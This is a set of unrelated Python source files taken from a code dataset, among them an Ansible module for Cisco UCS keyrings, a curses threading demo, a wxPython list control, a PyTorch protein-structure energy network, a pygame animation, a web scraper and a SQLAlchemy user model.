ucs_proxy=dict(default=None)\n )\n\n\ndef _ansible_module_create():\n argument_spec = dict()\n argument_spec.update(_argument_mo())\n argument_spec.update(_argument_custom())\n argument_spec.update(_argument_connection())\n\n return AnsibleModule(argument_spec,\n supports_check_mode=True)\n\n\ndef _get_mo_params(params):\n from ansible.module_utils.cisco_ucs import UcsConnection\n args = {}\n for key in _argument_mo():\n if params.get(key) is None:\n continue\n args[key] = params.get(key)\n return args\n\n\ndef setup_keyring(server, module):\n from ucsm_apis.admin.keyring import key_ring_create\n from ucsm_apis.admin.keyring import key_ring_delete\n from ucsm_apis.admin.keyring import key_ring_exists\n\n ansible = module.params\n args_mo = _get_mo_params(ansible)\n exists, mo = key_ring_exists(handle=server, **args_mo)\n\n if ansible[\"state\"] == \"present\":\n if module.check_mode or exists:\n return not exists\n key_ring_create(handle=server, **args_mo)\n else:\n if module.check_mode or not exists:\n return exists\n key_ring_delete(server, mo.name)\n\n return True\n\n\ndef setup(server, module):\n result = {}\n err = False\n\n try:\n result[\"changed\"] = setup_keyring(server, module)\n except Exception as e:\n err = True\n result[\"msg\"] = \"setup error: %s \" % str(e)\n result[\"changed\"] = False\n\n return result, err\n\n\ndef main():\n from ansible.module_utils.cisco_ucs import UcsConnection\n\n module = _ansible_module_create()\n conn = UcsConnection(module)\n server = conn.login()\n result, err = setup(server, module)\n conn.logout()\n if err:\n module.fail_json(**result)\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/ucsm-config/library/cisco_ucs_keyring.py","file_name":"cisco_ucs_keyring.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"449000628","text":"import curses\nimport threading\nimport time\nimport Queue\n\n\ndef curse_open():\n screen = curses.initscr()\n curses.noecho()\n curses.cbreak()\n screen.keypad(1)\n return screen\n\n\ndef curse_close(screen):\n if screen:\n screen.keypad(0)\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n\n\nclass Consumer(threading.Thread):\n def __init__(self, economy):\n super(Consumer, self).__init__()\n self.economy = economy\n\n self.screen = None\n\n self.queue = Queue.Queue()\n\n def run(self):\n self.economy.consumer_started.set()\n self.economy.producer_started.wait()\n\n try:\n self.screen = curse_open()\n\n while self.economy.producer.is_alive():\n self.consume()\n\n raise curses.error\n except:\n curse_close(self.screen)\n\n def consume(self):\n pkg = self.queue.get()\n msg = \"Pkg rcvd @ \" + str(time.time())\n self.screen.addstr(pkg + \"; \" + msg + \"\\n\")\n self.screen.refresh()\n time.sleep(1)\n\n\nclass Producer(threading.Thread):\n def __init__(self, economy):\n super(Producer, self).__init__()\n self.economy = economy\n\n def run(self):\n self.economy.producer_started.set()\n self.economy.consumer_started.wait()\n\n while self.economy.consumer.is_alive():\n self.produce()\n\n def produce(self):\n pkg = \"Pkg prcd @ \" + str(time.time())\n self.economy.consumer.queue.put(pkg)\n time.sleep(1)\n\n\nclass Economy:\n def __init__(self):\n self.consumer = Consumer(self)\n self.producer = Producer(self)\n\n self.consumer_started = threading.Event()\n self.producer_started = threading.Event()\n\n self.producer.start()\n 
self.consumer.start()\n\nEconomy()","sub_path":"threading2.py","file_name":"threading2.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418129270","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom ContributorEntryDialog import ContributorEntryDialog\n\nclass ContributorListCtrl(wx.ListCtrl):\n def __init__(self,parent):\n wx.ListCtrl.__init__(self,parent,armid.PROJECTSETTINGS_LISTCONTRIBUTORS_ID,size=wx.DefaultSize,style=wx.LC_REPORT | wx.LC_SORT_ASCENDING)\n self.InsertColumn(0,'Firstname')\n self.SetColumnWidth(0,100)\n self.InsertColumn(1,'Surname')\n self.SetColumnWidth(0,100)\n self.InsertColumn(2,'Affiliation')\n self.SetColumnWidth(2,100)\n self.InsertColumn(3,'Role')\n self.SetColumnWidth(3,100)\n self.theSelectedIdx = -1\n self.theMenu = wx.Menu()\n self.theMenu.Append(armid.CONTRIBUTORLISTCTRL_MENUADD_ID,'Add')\n self.theMenu.Append(armid.CONTRIBUTORLISTCTRL_MENUDELETE_ID,'Delete')\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK,self.OnRightDown)\n self.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnItemSelected)\n self.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnItemDeselected)\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED,self.onEntryActivated)\n wx.EVT_MENU(self.theMenu,armid.CONTRIBUTORLISTCTRL_MENUADD_ID,self.onAddEntry)\n wx.EVT_MENU(self.theMenu,armid.CONTRIBUTORLISTCTRL_MENUDELETE_ID,self.onDeleteEntry)\n\n def OnItemSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def OnItemDeselected(self,evt):\n self.theSelectedIdx = -1\n\n def OnRightDown(self,evt):\n self.PopupMenu(self.theMenu)\n\n def onAddEntry(self,evt):\n dlg = ContributorEntryDialog(self)\n if (dlg.ShowModal() == armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID):\n firstName = dlg.firstName()\n surname = dlg.surname()\n affiliation = dlg.affiliation()\n role = dlg.role()\n idx = self.GetItemCount()\n self.InsertStringItem(idx,firstName)\n self.SetStringItem(idx,1,surname)\n self.SetStringItem(idx,2,affiliation)\n self.SetStringItem(idx,3,role)\n\n def onDeleteEntry(self,evt):\n if (self.theSelectedIdx == -1):\n errorText = 'No entry selected'\n errorLabel = 'Delete definition'\n dlg = wx.MessageDialog(self,errorText,errorLabel,wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n else:\n selectedValue = self.GetItemText(self.theSelectedIdx)\n self.DeleteItem(self.theSelectedIdx)\n\n def onEntryActivated(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n firstName = self.GetItemText(self.theSelectedIdx)\n surname = self.GetItem(self.theSelectedIdx,1)\n affiliation = self.GetItem(self.theSelectedIdx,2)\n role = self.GetItem(self.theSelectedIdx,3)\n \n dlg = ContributorEntryDialog(self,firstName,surname.GetText(),affiliation.GetText(),role.GetText())\n if (dlg.ShowModal() 
== armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID):\n self.SetStringItem(self.theSelectedIdx,0,dlg.firstName())\n self.SetStringItem(self.theSelectedIdx,1,dlg.surname())\n self.SetStringItem(self.theSelectedIdx,2,dlg.affiliation())\n self.SetStringItem(self.theSelectedIdx,3,dlg.role())\n\n def load(self,entries):\n for firstName,surname,affiliation,role in entries:\n idx = self.GetItemCount()\n self.InsertStringItem(idx,firstName)\n self.SetStringItem(idx,1,surname)\n self.SetStringItem(idx,2,affiliation)\n self.SetStringItem(idx,3,role)\n\n def dimensions(self):\n entries = []\n for x in range(self.GetItemCount()):\n firstName = self.GetItemText(x)\n surname = self.GetItem(x,1)\n affiliation = self.GetItem(x,2)\n role = self.GetItem(x,3)\n entries.append((firstName,surname.GetText(),affiliation.GetText(),role.GetText()))\n return entries\n","sub_path":"cairis/cairis/ContributorListCtrl.py","file_name":"ContributorListCtrl.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452101633","text":"import argparse\nimport os\nimport sys\nimport json\n\nsys.path.append('../classes/')\nfrom imagetype import ImgType\nfrom dlthread import Downloader\n\n\ndef main():\n\n if FLAGS.type == 'txt':\n getimgtypestxt(FLAGS.output_dir, FLAGS.input_file)\n else:\n getimgtypesfromjson(FLAGS.output_dir, FLAGS.input_file)\n\ndef chunks(l, n):\n return [l[i::n] for i in range(n)]\n\n\ndef getimgtypesfromtxt(path, filename):\n result = []\n nb = 0\n with open(filename) as file:\n for line in file:\n nb += 1\n temp = str(line.rstrip()).split(\"\\t\")\n result.append(ImgType(temp[0], temp[1]))\n\n out = os.path.join(os.getcwd(), path)\n\n li = chunks(result, 5)\n\n t1 = Downloader(li[0], out, '\\x1b[0;30;44m')\n\n t2 = Downloader(li[1], out, '\\x1b[0;30;45m')\n t3 = Downloader(li[3], out, '\\x1b[0;30;46m')\n\n t4 = Downloader(li[4], out, '\\x1b[0;30;47m')\n\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n return nb\n\n\n\ndef getimgtypesfromjson(path, filename):\n\n result = []\n nb = 0\n with open(filename) as file:\n data = json.load(file)\n\n\n for key in data.keys():\n for row in data[key]:\n nb += 1\n result.append(ImgType(key, row))\n\n out = os.path.join(os.getcwd(), path)\n\n li = chunks(result, 5)\n\n t1 = Downloader(li[0], out, '\\x1b[0;30;44m')\n\n t2 = Downloader(li[1], out, '\\x1b[0;30;45m')\n t3 = Downloader(li[3], out, '\\x1b[0;30;46m')\n\n t4 = Downloader(li[4], out, '\\x1b[0;30;47m')\n\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n return nb\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_file', type=str, default='vis10cat.txt',\n help='Select input file default : vis10cat.txt ')\n parser.add_argument('--output_dir', type=str, default=str(os.getcwd()),\n help='Set ouput directory (default current)')\n\n parser.add_argument('--type', type=str, default=\"txt\",\n help='Set input type default (txt) alt : json')\n\n\n FLAGS, unparsed = parser.parse_known_args()\n main()\n","sub_path":"datasetManager/multidownload/readerDL.py","file_name":"readerDL.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215323087","text":"import numpy as np\nimport json\nimport tables\nfrom MWTracker.trackWorms.getFilteredSkels import _h_calAreaSignedArray\n\ndef 
hasExpCntInfo(skeletons_file):\n # i'm reading this data twice (one more in switchCntSingleWorm), but I think this is cleaner\n # from a function organization point of view.\n with tables.File(skeletons_file, 'r') as fid:\n if not '/experiment_info' in fid:\n return False\n exp_info_b = fid.get_node('/experiment_info').read()\n exp_info = json.loads(exp_info_b.decode(\"utf-8\"))\n\n # print('ventral_side:{}'.format(exp_info['ventral_side']))\n # only clockwise and anticlockwise are valid contour orientations\n return exp_info['ventral_side'] in ['clockwise', 'anticlockwise']\n\ndef isBadVentralOrient(skeletons_file):\n with tables.File(skeletons_file, 'r') as fid:\n exp_info_b = fid.get_node('/experiment_info').read()\n exp_info = json.loads(exp_info_b.decode(\"utf-8\"))\n\n if not exp_info['ventral_side'] in ['clockwise', 'anticlockwise']:\n raise ValueError(\n '\"{}\" is not a valid value for '\n 'ventral side orientation. Only \"clockwise\" or \"anticlockwise\" '\n 'are accepted values'.format(\n exp_info['ventral_side']))\n\n has_skeletons = fid.get_node('/trajectories_data').col('has_skeleton')\n\n # let's use the first valid skeleton, it seems like a waste to use all the other skeletons.\n # I checked earlier to make sure the have the same orientation.\n\n valid_ind = np.where(has_skeletons)[0]\n if valid_ind.size == 0:\n return\n\n cnt_side1 = fid.get_node('/contour_side1')[valid_ind[0], :, :]\n cnt_side2 = fid.get_node('/contour_side2')[valid_ind[0], :, :]\n A_sign = _h_calAreaSignedArray(cnt_side1, cnt_side2)\n\n # if not (np.all(A_sign > 0) or np.all(A_sign < 0)):\n # raise ValueError('There is a problem. All the contours should have the same orientation.')\n\n return (exp_info['ventral_side'] == 'clockwise' and A_sign[0] < 0) or \\\n (exp_info['ventral_side'] == 'anticlockwise' and A_sign[0] > 0)\n\n\ndef switchCntSingleWorm(skeletons_file):\n # change contours if they do not match the known orientation\n if isBadVentralOrient(skeletons_file):\n with tables.File(skeletons_file, 'r+') as fid:\n # since here we are changing all the contours, let's just change\n # the name of the datasets\n side1 = fid.get_node('/contour_side1')\n side2 = fid.get_node('/contour_side2')\n\n side1.rename('contour_side1_bkp')\n side2.rename('contour_side1')\n side1.rename('contour_side2')","sub_path":"MWTracker/featuresAnalysis/correctVentralDorsal.py","file_name":"correctVentralDorsal.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193992249","text":"import os, sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch.optim as optim\n\n\n#from src \\\nimport graphOps as GO\n#from src \\\nimport utils\n\ndef intTanh(x):\n # s always has real part >= 0\n s = torch.sign(x) * x\n p = torch.exp(-2 * s)\n return s + torch.log1p(p) - np.log(2)\n\ndef tanhsq(x, a=0.1):\n # s always has real part >= 0\n return torch.tanh(a*x)**2\n\ndef dtanhsq(x, a=0.1):\n # s always has real part >= 0\n return 2*a*torch.tanh(a*x)*(1-torch.tanh(a*x)**2)\n\n\ndef doubleLayer(x, K1, K2):\n x = F.conv1d(x, K1.unsqueeze(2))\n x = F.instance_norm(x)\n x = torch.tanh(x)\n\n x = F.conv1d(x, K2.unsqueeze(2))\n\n return x\n\ndef getBondAngle(T, Mask):\n\n n = T.shape\n T = T.reshape(n[0],n[1],3,4,n[3])\n A = T[:,:,:,0,:]\n dA = A[:, :, :, 1:] - A[:,:,:,:-1]\n Am = dA[:, :, :,:-1]\n Ap = dA[:, :, :, 1:]\n\n n1 = 
Am/torch.sqrt(torch.sum(Am**2,dim=2,keepdim=True)+1e-3)\n n2 = Ap/torch.sqrt(torch.sum(Ap**2,dim=2,keepdim=True)+1e-3)\n Cp = torch.zeros_like(A[:,:,0,:])\n Cp[:,:,1:-1] = torch.sum(n1*n2,dim=2)\n Cp = Mask*Cp\n return Cp\n\ndef vectorCrossProd(n1, n2):\n # V1 = [B, C, 3 N]\n # V2 = [B, C, 3, N]\n # vy*wz - vz*wy\n # vz*wx - vx*wz\n # vx*wy - vy*wx\n\n Cx = (n1[:, :, 1, :] * n2[:, :, 2, :] - n1[:, :, 2, :] * n2[:, :, 1, :]).unsqueeze(2)\n Cy = (n1[:, :, 2, :] * n2[:, :, 0, :] - n1[:, :, 0, :] * n2[:, :, 2, :]).unsqueeze(2)\n Cz = (n1[:, :, 0, :] * n2[:, :, 1, :] - n1[:, :, 1, :] * n2[:, :, 0, :]).unsqueeze(2)\n\n C = torch.cat((Cx, Cy, Cz), dim=2)\n\n return C\n\n\ndef torsionAngle(V1,V2,V3,V4):\n\n A = V2 - V1\n B = V3 - V2\n C = V4 - V3\n\n Bsq = torch.relu(torch.sum(B * B, dim=2, keepdim=True))\n AC = torch.sum(A * C, dim=2, keepdim=True)\n AB = torch.sum(A * B, dim=2, keepdim=True)\n BC = torch.sum(B * C, dim=2, keepdim=True)\n x = -torch.sum(Bsq*AC, dim=2, keepdim=True) + torch.sum(AB*BC, dim=2, keepdim=True)\n\n absB = torch.sqrt(Bsq).sum(dim=2, keepdim=True)\n BxC = vectorCrossProd(B, C)\n y = torch.sum((absB*A)*BxC, dim=2, keepdim=True)\n\n cosTheta = x/torch.sqrt(x**2 + y**2 + 1e-3)\n sinTheta = y/torch.sqrt(x**2 + y**2 + 1e-3)\n theta = torch.arccos(cosTheta)\n theta = theta*torch.sign(y)\n return theta, cosTheta, sinTheta\n\ndef getTorsionAngles(x):\n # The coords are organized as (Ca, C, N)\n nnodes = x.shape[-1]\n Ca = x[:, :, :3, :-1]\n C = x[:, :, 3:6, :-1]\n N = x[:, :, 6:9, :-1]\n Ca2 = x[:, :, :3, 1:]\n C2 = x[:, :, 3:6, 1:]\n N2 = x[:, :, 6:9, 1:]\n # Compute w = tor(Ca,C,N,Ca)\n omega, cosOmega, sinOmega = torsionAngle(Ca,C,N2,Ca2)\n\n # Compute phi = tor(C,N,Ca,C2)\n phi, cosPhi, sinPhi = torsionAngle(C,N2,Ca2,C2)\n\n # Compute psi = tor(N, Cα, C, N2)\n psi, cosPsi, sinPsi = torsionAngle(N, Ca, C, N2)\n\n #tor = torch.cat((omega, phi, psi), dim=2)\n\n phi = phi[0,0,0,:-1].squeeze()\n cosPhi = cosPhi[0,0,0,:-1].squeeze()\n sinPhi = sinPhi[0,0,0,:-1].squeeze()\n\n psi = psi[0,0,0, 1:].squeeze()\n cosPsi = cosPsi[0,0,0, 1:].squeeze()\n sinPsi = sinPsi[0,0,0, 1:].squeeze()\n\n omega = omega[0,0,0, 1:].squeeze()\n cosOmega = cosOmega[0,0,0, 1:].squeeze()\n sinOmega = sinOmega[0,0,0, 1:].squeeze()\n\n\n tor = torch.zeros(3,nnodes)\n tor[0, 1:-1] = phi\n tor[1, 1:-1] = psi\n tor[2, 1:-1] = omega\n\n torS = torch.stack((cosOmega, sinOmega, cosPhi, sinPhi, cosPsi, sinPsi), dim=0)\n torS = torch.cat((torch.zeros(6,1), torS, torch.zeros(6,1)),dim=1)\n return tor, torS\n\n\ndef getNodeDistance(T, Graph, Mask=[]):\n # Energy of all the nonconstant distances\n # Data organized as A C N B\n\n if len(Mask) == 0:\n Mask = torch.ones(1,1,T.shape[3])\n\n MaskE = Graph.nodeAve(Mask)\n inValidInd = MaskE<1\n\n n = T.shape\n nnodes = n[-1]\n\n T = T.reshape(n[0], n[1], 4, 3, nnodes)\n\n I = torch.tensor([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], device=T.device)\n J = torch.tensor([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], device=T.device)\n # K = [1, 3, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n TI = T[:, :, I, :, :]\n TJ = T[:, :, J, :, :]\n G = TI[:, :, :, :, Graph.iInd] - TJ[:, :, :, :, Graph.jInd]\n\n f = torch.sum(G ** 2, dim=3)\n\n f[:, :, :, inValidInd.squeeze()] = 0\n return f\n\n\n\nclass energyGraphNetwork(nn.Module):\n\n def __init__(self, Nopen, nlayer, h=0.1):\n super(energyGraphNetwork, self).__init__()\n\n self.h = h\n nodeFeatIn = 41+6 # PSSM+Seq+Tor\n EdgeFeatIn = 16 # distances\n self.K1Nopen = nn.Parameter(torch.randn(Nopen, nodeFeatIn))\n self.K2Nopen = 
nn.Parameter(torch.randn(Nopen, Nopen))\n\n self.K1Eopen = nn.Parameter(torch.randn(Nopen, EdgeFeatIn))\n self.K2Eopen = nn.Parameter(torch.randn(Nopen, Nopen))\n\n nopen = 3*Nopen\n self.nopen = nopen\n\n Id = (torch.cat((torch.eye(nopen,nopen),torch.eye(nopen,nopen)), dim=1)).unsqueeze(0)\n IdTensor = torch.repeat_interleave(Id, nlayer, dim=0)\n self.KE = nn.Parameter(IdTensor)\n\n self.Kclose = nn.Parameter(torch.randn(1, nopen)*1e-2)\n\n def forward(self, SeqData, Coords, Graph, M=torch.ones(1)):\n\n ME = torch.ones(1)\n if len(M)>1:\n ME = Graph.nodeGrad(M)\n ME[ME<1] = 0\n\n xe = getNodeDistance(Coords, Graph, Mask=[])\n xe = xe - torch.mean(xe, dim=3, keepdim=True)\n _, xn = getTorsionAngles(Coords)\n xn = torch.cat((xn.unsqueeze(0), SeqData),dim=1)\n #xn = SeqData\n xn = doubleLayer(xn, self.K1Nopen, self.K2Nopen)\n xe = doubleLayer(xe.squeeze(1), self.K1Eopen, self.K2Eopen)\n\n xn = torch.cat([xn, Graph.edgeDiv(xe), Graph.edgeAve(xe)], dim=1)\n xn = xn - xn.mean(dim=2, keepdim=True)\n\n nlayers = self.KE.shape[0]\n\n for i in range(nlayers):\n\n gradX = ME*Graph.nodeGrad(xn)\n intX = ME*Graph.nodeAve(xn)\n\n xe = torch.cat([gradX, intX], dim=1)\n #xe = doubleLayer(xe, self.KE1[i], self.KE2[i])\n xe = doubleLayer(xe, self.KE[i], self.KE[i].t())\n\n divE = M*Graph.edgeDiv(xe[:,:self.nopen,:])\n aveE = M*Graph.edgeAve(xe[:,self.nopen:2*self.nopen,:])\n\n xn = M*(xn - self.h * (divE + aveE))\n\n xn = F.conv1d(xn, self.Kclose.unsqueeze(2))\n return xn\n\ndef colisionDetection(P, M, contact=6.0):\n\n ind = M.squeeze() > 0\n P = P[:, :, ind].squeeze(0)\n p = torch.sum(P ** 2, dim=0, keepdim=True)\n DP = torch.triu(torch.sqrt(torch.relu(p + p.t() - 2 * P.t() @ P)), 1)\n\n con = (DP < contact)\n\n DP = DP[con]\n a = (DP > 0)\n DP = DP[a]\n\n ecol = -torch.log(DP/contact)\n ecol = ecol.sum()\n\n return ecol\n\n\ndef updateCoords(enet, X0, xnS, Graph, lrX=1e-1, iter=100, Emin=0, ratio=0.8):\n ###### Optimize over X - Generator\n Xp = torch.clone(X0).detach()\n Xp.requires_grad = True\n optimizerE = optim.SGD([{'params': Xp, 'lr': lrX}])\n M = torch.ones(1,1, X0.shape[-1])\n for i in range(iter):\n optimizerE.zero_grad()\n #Xpp, res = cons.proj(Xp, 100, 1e-2)\n Xpp = Xp\n ep = enet(xnS,Xpp, Graph)\n Ep = 0.5*(ep**2).mean()\n Ec = colisionDetection(Xpp.squeeze(1), M, contact=6.0)\n\n Etotal = Ep + Ec\n Etotal.backward()\n torch.nn.utils.clip_grad_value_(Xp, 0.1)\n optimizerE.step()\n\n dRMSD = utils.lossFundRMSD(Xpp.squeeze(0), X0.squeeze(0), M, contact=1e3)\n dX = torch.mean(torch.abs(Xp-X0))\n print(' Eiter = %2d rloss = %3.2e Ep = %3.2e Ec = %3.2e dRMSD = %3.2e |dX| = %3.2e'%\n (i, Emin/Etotal, Ep, Ec, dRMSD, dX))\n if Etotal < ratio*Emin:\n return Xp, Ep\n return Xp, Etotal\n","sub_path":"energyNetwork.py","file_name":"energyNetwork.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74368412","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 4 13:13:52 2021\n\n@author: Lenovo-PC\n\"\"\"\n\n# import pygame module in this program\nimport pygame;\nimport animate;\n\n# activate the pygame library .\n# initiate pygame and give permission\n# to use pygame's functionality.\npygame.init()\n\n# create the display surface object\n# of specific dimension..e(500, 500).\nwin = pygame.display.set_mode((600, 600))\n\n# set the pygame window name\npygame.display.set_caption(\"Moving rectangle\")\n\n# object current co-ordinates\nx = 200\ny = 200\na=100\nb=100\n# dimensions of the object\nwidth = 
20\nheight = 20\n\n# velocity / speed of movement\nvel = 10\nanimate.resetStateToInitialConditions()\nx = animate.state[\"positions\"][0][\"x\"]\nprint(animate.state[\"positions\"][0][\"x\"])\nprint(x)\ny = animate.state[\"positions\"][0][\"y\"]\na=animate.state[\"positions\"][1][\"x\"]\nb=animate.state[\"positions\"][1][\"y\"]\n# Indicates pygame is running\nrun = True\n\n# infinite loop\nwhile run:\n # creates time delay of 10ms\n pygame.time.delay(10)\n \n # iterate over the list of Event objects\n # that was returned by pygame.event.get() method.\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n \n # it will make exit the while loop\n run = False\n # stores keys pressed\n \n \n \n # completely fill the surface object\n # with black colour\n win.fill((0, 0, 0))\n \n # drawing objects on screen (two circles here)\n\n \n \n \n \n \n \n # it refreshes the window\n animate.updatePosition() \n print(animate.state[\"positions\"][0][\"x\"])\n pygame.draw.circle(win, (204, 255, 255), animate.coord(a,b), 15)\n pygame.draw.circle(win, (255,255,255), animate.coord(x,y), 15)\n pygame.display.update()\n print(animate.coord(a,b))\n print(animate.coord(x,y))\n \n\n# closes the pygame window\npygame.quit()\n","sub_path":"object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455222096","text":"# -*- coding:utf-8 -*-\r\nimport re\r\nimport dataNode\r\n\r\nclass Node():\r\n __url = ''\r\n __refPattern = re.compile(r'.*?',re.S)\r\n __datePattern = re.compile(r'[\d-]*')\r\n\r\n def __init__(self):\r\n self.__url = \"http://www.sis.zju.edu.cn\"\r\n\r\n def __del__(self):\r\n pass\r\n\r\n def getUrl(self):\r\n return self.__url\r\n\r\n # extract the pieces of one entry line: title, url and time\r\n def extractOne(self, oneLine):\r\n time = ''\r\n title = ''\r\n url = ''\r\n ref = self.__refPattern.search(oneLine)\r\n url = ref.group()\r\n url = url[url.find('\"')+1:]\r\n name = self.__titlePattern.search(oneLine)\r\n title = name.group()\r\n title = title[8:-4]\r\n date = self.__datePattern.search(oneLine)\r\n time = date.group()\r\n time = time[4:-5]\r\n return [title,url,time]\r\n\r\n\r\n def extract(self, plainTxt):\r\n plainTxt = unicode(plainTxt, 'utf-8')\r\n plainTxt = plainTxt[plainTxt.find(u''):]\r\n plainTxt = plainTxt[:plainTxt.find(u'')]\r\n pattern = re.compile(u'.*?
',re.S)\r\n\r\n matchs = pattern.findall(plainTxt)\r\n\r\n patternTr = re.compile(u'.*?',re.S)\r\n\r\n ret = []\r\n\r\n for match in matchs:\r\n lines = patternTr.findall(match)\r\n for line in lines:\r\n data = self.extractOne(line)\r\n element = dataNode.dataNode(data[0],\r\n self.__url + data[1],\r\n data[2])\r\n ret.append(element)\r\n\r\n# sorted(ret, cmp = dataNode.cmpNode)\r\n ret = sortList(ret)\r\n return ret\r\n\r\ndef sortList(l1):\r\n l2 = []\r\n l1.sort(dataNode.cmpNode)\r\n for i in range(len(l1) - 1):\r\n if dataNode.cmpNode(l1[i], l1[i+1]) != 0:\r\n l2.append(l1[i])\r\n l2.append(l1[-1])\r\n return l2\r\n","sub_path":"fromSIS.py","file_name":"fromSIS.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350582736","text":"#!/usr/local/bin/python3.8\nList=[1,-2,3,4,6]\neven=0\nodd=0\nnegative=0\nfor i in List:\n if i > 0:\n if i%2 == 0:\n even=even+i\n else:\n odd=odd+i\n else:\n negative=negative+i\nprint (\"List is:\",List)\nprint (\"Sum of Even Number From List: \",even)\nprint (\"Sum of Odd Number From List: \",odd)\nprint (\"Sum of Negative Number From List: \",negative)\n","sub_path":"python_10082020/SumOfEvenOddNegative.py","file_name":"SumOfEvenOddNegative.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409839988","text":"from sqlalchemy import Column, String, Integer, BigInteger, DateTime\n\nfrom app import db\n\n\nclass User(db.Model):\n __tablename__ = \"users\"\n\n c_id = Column(\"id\", Integer, primary_key=True)\n c_join = Column(\"join\", DateTime)\n\n c_twi_id = Column(\"twi_id\", BigInteger)\n c_twi_token = Column(\"twi_token\", String(60))\n c_twi_secret = Column(\"twi_secret\", String(120))\n\n c_wei_id = Column(\"wei_id\", BigInteger)\n c_wei_token = Column(\"wei_token\", String(60))\n c_wei_expire = Column(\"wei_expire\", DateTime)\n\n def __repr__(self):\n return \"<User %s, joined at %s>\" % (self.c_id, str(self.c_join))\n\n @property\n def is_linked_to_twi(self):\n return self.c_twi_id is not None\n\n @property\n def is_linked_to_wei(self):\n return self.c_wei_id is not None\n\n def update_fields(self, fields, instant_save=True):\n for field, value in fields.items():\n setattr(self, field, value)\n if instant_save:\n db.session.commit()\n\n @staticmethod\n def merge_user(del_user, left_user, update_fields=None, by_join_order=False, instant_save=True):\n \"\"\" Merge two users: del_user is the user deleted after the merge, left_user is the user kept.\n update_fields are fields to update manually; the matching fields on left_user are forcibly updated.\n If by_join_order is True, the argument order is ignored and the user who joined later is deleted.\n This function exists to simplify the more complex user-merge scenarios that may come up later.\n \"\"\"\n\n if by_join_order:\n del_user, left_user = sorted([del_user, left_user], key=lambda u: u.c_join, reverse=True)\n\n columns = [c for c in left_user.__dict__ if c.startswith('c_')]\n if update_fields is None:\n update_fields = dict()\n for column in columns:\n # if the column is not in the manual-update set and left_user's value for it is empty, use del_user's value\n if column not in update_fields and not getattr(left_user, column):\n if getattr(del_user, column):\n setattr(left_user, column, getattr(del_user, column))\n\n left_user.update_fields(update_fields, False)\n\n if instant_save:\n db.session.delete(del_user)\n db.session.commit()\n","sub_path":"app/models/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
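The merge_user staticmethod in the record above deduplicates accounts by copying every non-empty c_* field from the deleted row into the kept row before committing. A minimal usage sketch, assuming an active Flask app context with this model's configured db session and two persisted User rows; the primary keys and the forced token field below are hypothetical:

    # Merge two duplicate accounts. With by_join_order=True the argument
    # order is ignored and the row that joined later is the one deleted.
    older = User.query.get(1)   # hypothetical primary keys
    newer = User.query.get(2)
    User.merge_user(
        newer, older,
        update_fields={"c_twi_token": newer.c_twi_token},  # force-update this field on the kept row
        by_join_order=True,
    )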
